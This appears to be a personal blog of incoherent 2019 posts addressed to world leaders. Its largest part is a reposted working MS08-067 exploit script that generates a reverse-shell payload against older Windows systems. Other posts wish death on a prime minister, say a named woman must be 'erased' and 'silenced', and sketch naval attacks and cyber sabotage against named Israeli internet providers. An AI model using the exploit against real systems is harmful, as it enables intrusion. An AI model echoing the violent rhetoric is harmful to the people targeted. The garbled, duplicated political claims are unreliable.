Wednesday, September 18, 2019
intel iran folder
the objective is the destruction of putagal. convincing iranians,
syrians and NKs, to blow a nuclear cake, and saying, is not israel
terratory at stake, but cash...their little cash, however affects
russian cash...thats bad news. of course, in that case, supposly working
for israel, means...not even 10 euros for yogurts...bcz Berlim is much
more important, than my small fly pride issue. Therefore, small range
missiles transfered fromn one vessel to another, covered by a chemical
cargo, fait divers, that never left the boat on the way to iran, and
then back to the sea...and the offload, is made by that type of gunmen,
that if i could have my project done...could delievere in my hands...the
weapon i give my life for
Saturday, September 14, 2019
Hello! Back to warfare! Accept my advise...beeing consider anarchysts, fucks all perspectives of winning any political status, or win a military based conflit. An anarchyst does not wear an an army cap, an army camouflage, an army boots. For the marketing of their system, that offical image, fucks media manipulation, social thinking. Watch the Serbians, basing a war on desgate of Nato spirit of action..4 days without one single shoot, inside an urban guerrilla, that if not made by a dressed army, would have ended on 3 months..and it lasted for 7 years. Look the IRA, showing up an image of para military. If you go for Bagdad suiciders your war is lost on the 1st day, poor fundamentalist bastards.
...take the gas out. Russia will audit. Anything goes...weird...you die ...intel politics folder
Mr Gantz...the palestinians dont rule themselfs, its true..but pure
occupation is out of fashion since Hitler ocuppied Poland..that
terratory is useless for agriculture and vines...someone like...my
friends and I, have to pay from our taxes a big budget for setlers to
saty with their asses on their little nice new houses, doing
nothing..and pretending they are real citzens...occupation should not be
the right concept, of your ambitioouse big penis. More a pacification
region type, of speech and action. On the other hand...women dont like
big penis,is a myth...but...you dont like women, anyway ...
To answer...you Eminence the King of Saudi Arabia....Irans regime will change naturally, and even faster with economic reforms. Those reforms of course, can be manipulated...Iran is here, and they do know that! ..New centrifugers, are just fait divers, since, the cost is unbearble, without a partner behind it..but Russia is here...ask them, yourself. On the other hand, even for the Russians, priviliged relations with the iranians, privatization of the nuclear centrals, would be, both profit for the czares, while they still exist as faraos, with the treatd of a new world order, who doenst count with their existence...either for the iranian youth, to live in peace.
Im about to to say to the big smokers at the 3rd floor of the salomon avenue..that...10 years of Likud, attempts of gefallen Irans regime..were a totally failure...more 10 years, will go on beeing a Liebermans personal failure aussi. Iran proposal is much more ,economic turn around, solution...on a desk of a vanity arrogant military college rich boy...doing nothing...and at Economy...collapsing America. Why dont the beloved PM, tonight...as Putins eyes are looking at this big dog shit here....have a convenient heart attack, as Sharon...
Mr. Joe Biden...Mr President...Isabella is a ugly envy woman, milionaire bitch, that created the Cinderela fairy tale...she must be...erased, deleted...not bcz the world wont change...with our arms and perspectives...but bcz she indangerouse a little wall ruine of a Temple. Better play safe...and silence the little trilionaire hooker. By the way...Mr President...when you born in a certain...level...social class...you dont strike your ex husband..in public or in private...with the bad smell of his feet.
via GIPHY
To answer...you Eminence the King of Saudi Arabia....Irans regime will change naturally, and even faster with economic reforms. Those reforms of course, can be manipulated...Iran is here, and they do know that! ..New centrifugers, are just fait divers, since, the cost is unbearble, without a partner behind it..but Russia is here...ask them, yourself. On the other hand, even for the Russians, priviliged relations with the iranians, privatization of the nuclear centrals, would be, both profit for the czares, while they still exist as faraos, with the treatd of a new world order, who doenst count with their existence...either for the iranian youth, to live in peace.
Im about to to say to the big smokers at the 3rd floor of the salomon avenue..that...10 years of Likud, attempts of gefallen Irans regime..were a totally failure...more 10 years, will go on beeing a Liebermans personal failure aussi. Iran proposal is much more ,economic turn around, solution...on a desk of a vanity arrogant military college rich boy...doing nothing...and at Economy...collapsing America. Why dont the beloved PM, tonight...as Putins eyes are looking at this big dog shit here....have a convenient heart attack, as Sharon...
Mr. Joe Biden...Mr President...Isabella is a ugly envy woman, milionaire bitch, that created the Cinderela fairy tale...she must be...erased, deleted...not bcz the world wont change...with our arms and perspectives...but bcz she indangerouse a little wall ruine of a Temple. Better play safe...and silence the little trilionaire hooker. By the way...Mr President...when you born in a certain...level...social class...you dont strike your ex husband..in public or in private...with the bad smell of his feet.
via GIPHY
surprise factor ///warfare folder....attack Iran vs US
remove a mine from a oil tanker full with methanol, as a normal
operation of security...get close the oil tanker from a US or UK navy
ship, so it can kill...then acidentally exploded it...as soon as they
show up with drones, light laser crossing the skyp, the areas they want
to erase...and then hit with missiles strike...after one! hit of them on
your soil....2 naval ships...choose the ones that will block the F16s
from flying over your coast bcz of the smoke, both north and south
cardinals
strike Israel with sabotage port 1028 TCP, where they have all their firewalls..forget Elbit ...strike ...hit
Hot-Net internet services Ltd.
Cellcom Fixed Line Communication L.P.
Bezeq International-Ltd
strike Israel with sabotage port 1028 TCP, where they have all their firewalls..forget Elbit ...strike ...hit
Hot-Net internet services Ltd.
Cellcom Fixed Line Communication L.P.
Bezeq International-Ltd
Friday, September 13, 2019
2019 SEH Buffer Overflow Exploit drones attack hack folder
Instantly share code, notes, and snippets.
thel3l/ms08-067-fixed.py
Created last year
- 0
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python |
############################################################################################### |
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 # |
# Designed for Kali Linux - msfvenom and nc required to function # |
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ # |
# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). # |
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi # |
############################################################################################### |
import struct |
import time |
import sys |
import subprocess # Added to integrate msfvenom payload generation functionality |
from threading import Thread #Thread is imported incase you would like to modify |
try: |
from impacket import smb |
from impacket import uuid |
from impacket import dcerpc |
from impacket.dcerpc.v5 import transport |
except ImportError, _: |
print 'Install the following library to make this script work' |
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' |
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' |
sys.exit(1) |
if __name__ == '__main__': |
try: |
target = sys.argv[1] |
os = sys.argv[2] |
lhost = sys.argv[3] |
lport = sys.argv[4] |
except IndexError: |
print '' |
print ' ____________________________________________' |
print ' | |' |
print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
print ' | Based On Ported MSF Exploit By EKOZ |' |
print ' |____________________________________________|' |
print ' | |' |
print ' | USAGE |' |
print ' | MS08-067.py |
print ' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |' |
print ' |____________________________________________|' |
print ' | |' |
print ' | TARGET OS SELECTION |' |
print ' | 1 = Windows XP SP0/SP1 Universal |' |
print ' | 2 = Windows 2000 Universal |' |
print ' | 3 = Windows 2003 SP0 Universal |' |
print ' | 4 = Windows 2003 SP1 English |' |
print ' | 5 = Windows XP SP3 French (NX) |' |
print ' | 6 = Windows XP SP3 English (NX) |' |
print ' | 7 = Windows XP SP3 English (AlwaysOn NX) |' |
print ' |____________________________________________|\r\n' |
print ' I suggest you use a stageless payload to avoid issues with the handler.' |
sys.exit(-1) |
#badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40; |
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes |
#EXITFUNC=thread Important! |
# msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python |
# Auto Generate Reverse Shell Payload Using msfvenom |
mksh = "msfvenom -p windows/shell_reverse_tcp" |
mksh += " -b \'\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\'" |
mksh += " -e x86/call4_dword_xor" |
mksh += " EXITFUNC=thread" |
mksh += " --nopsled=32" |
mksh += " LHOST="+lhost |
mksh += " LPORT="+lport |
mksh += " -f python " |
mksh += " -a x86" |
mksh += " -o RevPld.py" |
print ' ____________________________________________' |
print ' | |' |
print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
print ' | Based On Ported MSF Exploit By EKOZ |' |
print ' |____________________________________________|\r\n' |
try: |
print "[+] Attempting To Generate Reverse Shell Payload ..." |
vnm = subprocess.Popen(mksh.split(), stdout=subprocess.PIPE) |
vnm.wait() |
print "[+] Reverse Shell Payload Generated Successfully..." |
except: |
print "[!] ERROR: Couldn't Generate Payload " |
sys.exit(-1) |
from RevPld import buf |
nops = "\x90"*30 |
nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10 |
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62" |
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01"; |
module_base = 0x6f880000 |
def generate_rop(rvas): |
gadget1="\x90\x5a\x59\xc3" |
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] |
gadget3="\xcc\x90\xeb\x5a" |
ret=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=gadget1 |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=gadget2[0] |
ret+=gadget2[1] |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=gadget2[2] |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=struct.pack(' |
ret+=gadget3 |
return ret |
class SRVSVC_Exploit(Thread): |
def __init__(self, target, os, port=445): |
super(SRVSVC_Exploit, self).__init__() |
self.__port = port |
self.target = target |
self.os = os |
def __DCEPacket(self): |
if (self.os=='1'): |
print '[+] Targeting : Windows XP SP0/SP1 Universal' |
ret = "\x61\x13\x00\x01" |
jumper = nonxjmper % (ret, ret) |
elif (self.os=='2'): |
print '[+] Targeting : Windows 2000 Universal' |
ret = "\xb0\x1c\x1f\x00" |
jumper = nonxjmper % (ret, ret) |
elif (self.os=='3'): |
print '[+] Targeting : Windows 2003 SP0 Universal' |
ret = "\x9e\x12\x00\x01" #0x01 00 12 9e |
jumper = nonxjmper % (ret, ret) |
elif (self.os=='4'): |
print '[+] Targeting : Windows 2003 SP1 English' |
ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL |
ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL |
jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL |
disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL |
jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2) |
elif (self.os=='5'): |
print '[+] Targeting : Windows XP SP3 French (NX)' |
ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07 |
disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 |
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
elif (self.os=='6'): |
print '[+] Targeting : Windows XP SP3 English (NX)' |
ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07 |
disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 |
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
elif (self.os=='7'): |
print '[+] Targeting : Windows XP SP3 English (AlwaysOn NX)' |
rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64} |
jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case. |
else: |
print '[+] OS Version Not Supported\n' |
sys.exit(-1) |
print '[+] Initiating Connection To '+target+":445" |
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) |
self.__trans.connect() |
self.__dce = self.__trans.DCERPC_class(self.__trans) |
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) |
path ="\x5c\x00"+"ABCDEFGHIJ"*10 + nops + buf +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" |
path += "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 |
server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" |
prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" |
self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00" |
return |
def run(self): |
self.__DCEPacket() |
self.__dce.call(0x1f, self.__stub) |
current = SRVSVC_Exploit(target, os) |
current.start() |
print "Now start up a multi/handler with your payload options set to: " |
print "payload windows/shell_reverse_tcp" # seems to be the most stable and consistent. |
print "LHOST ", lhost |
print "LPORT ", lport |
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Subscribe to:
Posts (Atom)
Ambassador @EmbaixadaRusPt URGENT INTEL the guy hedge fund is stable wontget higher to convince investors until end of the day @realDonaldTrump desesperate either help friends either stay with some cents @USTreasury @POLITICOEurope @ecb @FT @WSJ @EUCouncil @DeptofDefense
https://www.mediaite.com/news/billionaire-trump-backer-bill-ackman-skewers-howard-lutnicks-glaring-conflict-of-interest-he-profits-when-ou...
